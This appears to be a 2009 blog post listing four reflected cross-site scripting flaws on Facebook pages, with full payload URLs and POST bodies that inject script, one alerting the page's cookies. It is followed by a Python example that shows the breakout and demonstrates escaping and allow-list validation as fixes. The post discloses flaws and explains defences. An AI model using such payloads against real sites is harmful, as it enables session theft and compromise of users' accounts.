
I have already mentioned some security flaws that Facebook has faced, like how to view Facebook private profile pictures; some other Facebook security flaws were discovered between late 2008 and January 2009. And I'm pretty sure there will be more Facebook XSS hacking in 2009. Some major Facebook XSS vulnerabilities have been published on Xssed.com (the most well-known website for XSS news). And of course, you're very welcome to leave this post if you still think XSS is not dangerous at all :). Some critical Facebook XSS flaws can infect millions of Facebook members with malware. And it's not impossible for a new Facebook XSS worm to be developed under these circumstances.

The first Facebook XSS vulnerability occurred on the Facebook reset password page:
XSS:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Mirror : http://www.xssed.com/mirror/55951/

The 2nd : (with POST)
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

The 3rd :
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

The 4th : (with POST)
http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
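
All four requests above start their parameter value with a quote and a closing angle bracket, which is what lets reflected input leave an HTML attribute. The following is an added example, not code from this post or from Facebook: it decodes the `locale` value from the first URL and renders it three ways (raw, attribute-encoded, and allow-list validated). The hidden-input markup, the locale pattern, the `en_US` default and all function names are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: query string of the reset.php URL quoted in the post.
SAMPLE_QUERY = "locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E"

# Assumed allow-list: two lowercase letters, underscore, two uppercase letters.
LOCALE_RE = re.compile(r"[a-z]{2}_[A-Z]{2}")
DEFAULT_LOCALE = "en_US"  # assumed fallback


def get_param(query: str, name: str) -> str:
    """Return the first URL-decoded value of `name` from a query string or form body."""
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(locale: str) -> str:
    """Reflect the value into an attribute with no encoding (the flaw class above)."""
    return '<input type="hidden" name="locale" value="' + locale + '">'


def render_escaped(locale: str) -> str:
    """Encode for the HTML attribute context before reflecting."""
    safe = html.escape(locale, quote=True)
    return '<input type="hidden" name="locale" value="' + safe + '">'


def render_validated(locale: str) -> str:
    """Reject anything outside the allow-list, then encode anyway."""
    if not LOCALE_RE.fullmatch(locale):
        locale = DEFAULT_LOCALE
    return render_escaped(locale)


def breaks_out(markup: str) -> bool:
    """True if a script element survives in the rendered markup."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    value = get_param(SAMPLE_QUERY, "locale")
    for render in (render_vulnerable, render_escaped, render_validated):
        out = render(value)
        print(f"{render.__name__:18} script element present: {breaks_out(out)}")
        print("   ", out)
```

The same `get_param` call works on the POST bodies above, since form bodies use the same encoding as query strings.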

